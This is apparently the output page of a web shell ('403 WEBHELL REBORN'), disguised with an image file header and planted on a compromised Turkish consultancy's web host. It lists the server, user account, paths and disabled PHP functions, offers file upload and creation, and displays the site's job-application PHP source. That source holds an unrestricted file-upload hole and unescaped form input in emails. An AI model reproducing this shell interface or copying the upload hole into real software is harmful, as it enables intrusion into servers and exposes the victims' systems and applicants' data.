ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux srv244.medyabim.com 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
User : lionbursa ( 1773)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/lionbursa/domains/lionuluslararasidanismanlik.com/public_html/sistem/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/lionbursa/domains/lionuluslararasidanismanlik.com/public_html/sistem/ik.php
  <!-- Start main-content -->
  <div class="main-content">

  <section class="inner-header divider parallax layer-overlay overlay-dark-5" data-bg-img="style/images/ust-bg.jpg">
      <div class="container pt-60 pb-60">
        <!-- Section Content -->
        <div class="section-content">
          <div class="row"> 
            <div class="col-sm-8 text-left flip xs-text-center">
              <h2 class="title text-white"><span class="text-theme-white"> <?php echo $hdil["hik"]; ?></span></h2>
            </div>
            <div class="col-sm-4">
              <ol class="breadcrumb text-right sm-text-center mt-10">
                <li class="white"><a href="index.php"><?php echo $hdil["hanasayfa"]; ?></a></li>
                <li><a href="ik.html"><?php echo $hdil["hik"]; ?></a></li>
              </ol>
            </div>
          </div>
        </div>
      </div>
    </section>
    <!-- Divider: Google Map -->
    
    <!-- Divider: Contact -->
    <section class="divider">
      <div class="container">
        <div class="row pt-30">
          <div class="col-md-8">
 
            
      <?php
if($_GET[basvuruformu]==basvuruformu){
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$recaptcha = $_POST['g-recaptcha-response'];
if (!empty($recaptcha)) {
        include "sistem/curl.php";
        $google_url = "https://www.google.com/recaptcha/api/siteverify";
        $secret = '' .$secretkey. '';
        $ip = $_SERVER['REMOTE_ADDR'];
        $url = $google_url . "?secret=" . $secret . "&response=" . $recaptcha . "&remoteip=" . $ip;
        $res = curlKullan($url);
        $res = json_decode($res, true);
 
if ($res['success']) {
$tarih = date("d-m-Y");
$baslik = $_POST['baslik'];
$telefon = $_POST['telefon'];
$eposta = $_POST['eposta'];
$onay = $_POST['onay'];
$sonuc = $_POST['sonuc'];
$gelen=$_FILES["image1"]["tmp_name"];
$hedef="upload/cv2331/".$_FILES["image1"]["name"];
$dosya = basename( $_FILES['image1']['name']);
if(is_uploaded_file($gelen))
{
   move_uploaded_file($gelen,$hedef);
}
$ekle = $db->prepare("INSERT INTO ikform SET dosya = ?, tarih = ?, baslik = ?, telefon = ?,  eposta = ?");
$ekle->execute(array(
    $dosya,
	$tarih,
	$baslik,
	$telefon,
	$eposta
));
echo '
<body>
<script type="text/javascript">
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
</script>';

error_reporting(0); 										// HATA GÖNDERİMİNİ DEVREDIŞI BIRAKIR. MAIL İLE İLGİLİ HATA KODLARINI GÖRMEK İÇİN BURAYI KALDIRIN

// -------------- SMTP SUNUCU AYARLARI  BAŞLANGIÇ ----------------//


include "sistem/class.phpmailer.php"; 					// KLASÖR İSMİNİ DEĞİŞTİREBİLİRSİNİZ.
$sql2 = $db->query("SELECT * FROM ikform ORDER BY Id DESC LIMIT 1");
foreach ($sql2 as $b);
$sql = $db->query("SELECT * FROM ayarlar");
 foreach ($sql as $a) {
$mail = new PHPMailer();
$mail->IsSMTP();  											// SMTP İLE GÖNDER
$mail->CharSet = 'utf-8';									// SMTP GÖNDERİLEN MAİL KARAKTER SETİ
$mail->Host     = "$a[mailserver]"; 				// SMTP SUNUCU
$mail->Port  = "$a[mailbasligi]"; 										// SMTP SUNUCU PORTU : 465 VEYA 587 DİR. ANCAK HER İKİSİNDE HATA ALIRSANIZ 25 OLARAK AYARLAYIN.. " İSİMTESCİL.NET İÇİN 587 " 
$mail->SMTPAuth = true;   			  						// SMTP KIMLIK DOĞRULAMASI ETKIN -- // BAZI HOSTING FIRMALARINDA GEREKLIDIR. ÖRNEK : ISIMTESCIL.NET, NATRO
$mail->Username = "$a[mailadres]";  				// SMTP MAİL KULLANICI ADI
$mail->Password = "$a[mailparola]";		 						// SMTP MAİL ŞİFRENİZ
$mail->IsHTML(true); 										// SMTP MAİL HTML KULLANIMI ETKİN
$mail->From     = "$a[mailadres]"; 				// SMTP KULLANICI ADINIZ İLE AYNI OLMALI
$mail->FromName = "$a[mailadres]"; 						 //GÖNDEREN ADI
$mail->Sender = "$a[mailadres]";  					     	// GÖNDEREN MAIL
$mail->AddAddress("$a[mailadres]");    				 	//KIME GİDECEĞİ
$mail->Subject  =  $_POST['baslik']. " Kisiden İş Başvuru Formu";     // MAİL KONUSU


//--------------- SMTP SUNUCU AYARLARI BİTİŞ -------------------------//


$id = $_POST['id'];

$mail->Body     =  '<table class="made-in_text" border="0" cellSpacing="10" cellPadding="4" height="254" width="700">
					<tr>
						<td height="30" width="145" align="left">
						<font face="Tahoma" size="2"><strong>Adı Soyadı :</strong></font></td>
						<td align="left" width="509" bgcolor="#F6FDEC">
						<font size="2" face="Tahoma">'. $_POST['baslik'] . '</font></td>
					</tr>';
$mail->Body     .=  '<tr>
						<td height="30" align="left">
						<font face="Tahoma" size="2"><strong>Telefon Numarası :</strong></font></td>
						<td align="left" width="509" bgcolor="#F6FDEC">
						<font size="2" face="Tahoma">'. $_POST['telefon'] . '</font></td>
					</tr>';


$mail->Body     .=  '<tr>
						<td height="30" align="left">

						<font face="Tahoma" size="2"><strong>E-Posta :</strong></font></td>
						<td align="left" width="509" bgcolor="#F6FDEC">
						<font size="2" face="Tahoma">'. $_POST['eposta'] . '</font></td>
					</tr>';

$mail->Body     .=  '<tr>
						<td height="30" align="left">
						<font face="Tahoma" size="2"><strong>Cv Görüntüle :</strong></font></td>
						<td align="left" width="509" bgcolor="#F6FDEC">
						<font size="2" face="Tahoma">http://'. $_SERVER['HTTP_HOST'] . '/upload/cv2331/'.$b[dosya].'</font></td>
					</tr>';

$mail->Body     .= '<tr>
						<td height="30" align="left">
						<strong><font face="Tahoma" size="2">IP Adresi </font></strong><font face="Tahoma" size="2"><strong>:</strong></font></td>
						<td align="left" width="509" bgcolor="#F6FDEC">
						<font size="2" face="Tahoma">'. $_SERVER['REMOTE_ADDR'] . '</font></td>
					</tr></table>';
					
									if(!$mail->Send())
					{
					   echo '<div class="col-md-12">
                                            <!-- Alert -->
                                            <div class="alert alert-gfort alert-info" role="alert">
                                                <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                                                    <span aria-hidden="true">&times;</span>
                                                </button>'.$hdil["hhata"].'</div></div>';
					 
					
					}else{

					echo '<div class="col-md-12">
                                            <!-- Alert -->
                                            <div class="alert alert-gfort alert-success" role="alert">
                                                <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                                                    <span aria-hidden="true">&times;</span>
                                                </button>'.$hdil["hsonuc"].'</div></div>'; 

}}}						
        } else {
                echo '  <div class="col-md-12">
                                            <!-- Alert -->
                                            <div class="alert alert-gfort alert-danger" role="alert">
                                                <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                                                    <span aria-hidden="true">&times;</span>
                                                </button>Lütfen bot olmadığınızı doğrulayın.</div></div>';
        }
    } else {
                echo '  <div class="col-md-12">
                                            <!-- Alert -->
                                            <div class="alert alert-gfort alert-danger" role="alert">
                                                <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                                                    <span aria-hidden="true">&times;</span>
                                                </button>Lütfen bot olmadığınızı doğrulayın.</div></div>';
    }

}					
?>
        
            <!-- Contact Form -->
           <form action="index.php?page=ik&basvuruformu=basvuruformu"  method="post" enctype="multipart/form-data">

              <div class="row">
                <div class="col-sm-12">
                  <div class="form-group">
                    <label><?php echo $hdil["had"]; ?> <small>*</small></label>
                    <input name="baslik" class="form-control" type="text" placeholder="<?php echo $hdil["had"]; ?>" required="">
                  </div>
                </div>
                <div class="col-sm-12">
                  <div class="form-group">
                    <label><?php echo $hdil["hmail"]; ?> <small>*</small></label>
                    <input name="eposta" class="form-control required email" type="email" placeholder="<?php echo $hdil["hmail"]; ?>">
                  </div>
                </div>
              </div>
                
              <div class="row">
                <div class="col-sm-12">
                  <div class="form-group">
                    <label><?php echo $hdil["htel"]; ?> <small>*</small></label>
                    <input name="telefon" class="form-control required" type="text" placeholder="<?php echo $hdil["htel"]; ?>">
                  </div>
                </div>
                <div class="col-sm-12">
                  <div class="form-group">
                    <label>Cv Yükle</label><small> (Pdf, Doc, Xls Formatlarında Cv Yükleyiniz)</small>
                   <input name="image1" type="file" id="image1"  class="form-control" required="required">
                  </div>
                </div>
              </div>

              <div class="form-group">
              <div class="g-recaptcha" data-sitekey="<?php echo $sitekey; ?>"></div><br/>
                <button type="submit" class="btn btn-dark btn-theme-colored btn-flat mr-5" data-loading-text="Please wait..."><?php echo $hdil["hgonder"]; ?></button>
              </div>
            </form>


          </div>
          
          <div class="col-md-4">
            <div class="row">
              <div class="col-xs-12 col-sm-6 col-md-12">
                <div class="icon-box left media bg-deep p-30 mb-20"> <a class="media-left pull-left" href="#"> <i class="pe-7s-call text-theme-colored"></i></a>
                  <div class="media-body">
                    <h5 class="mt-0"><?php echo $hdil["htel"]; ?></h5>
                    <p><?php echo $tf; ?></p>
                  </div>
                </div>
              </div>
              <div class="col-xs-12 col-sm-6 col-md-12">
                <div class="icon-box left media bg-deep p-30 mb-20"> <a class="media-left pull-left" href="#"> <i class="pe-7s-mail text-theme-colored"></i></a>
                  <div class="media-body">
                    <h5 class="mt-0"><?php echo $hdil["hmail"]; ?></h5>
                    <p><?php echo $ep; ?></p>
                  </div>
                </div>
              </div>
              <div class="col-xs-12 col-sm-12 col-md-12">
                <div class="icon-box left media bg-deep p-30 mb-20"> <a class="media-left pull-left" href="#"> <i class="pe-7s-map-2 text-theme-colored"></i></a>
                  <div class="media-body">
                    <h5 class="mt-0"><?php echo $hdil["hiadres"]; ?></h5>
                    <p><?php echo $c; ?> <?php echo $l; ?></p>
                  </div>
                </div>
              </div>
            </div>
          </div> 
        </div>
      </div>
    </section>
  </div>
  <!-- end main-content -->

 <script src='https://www.google.com/recaptcha/api.js'></script>

Anon7 - 2021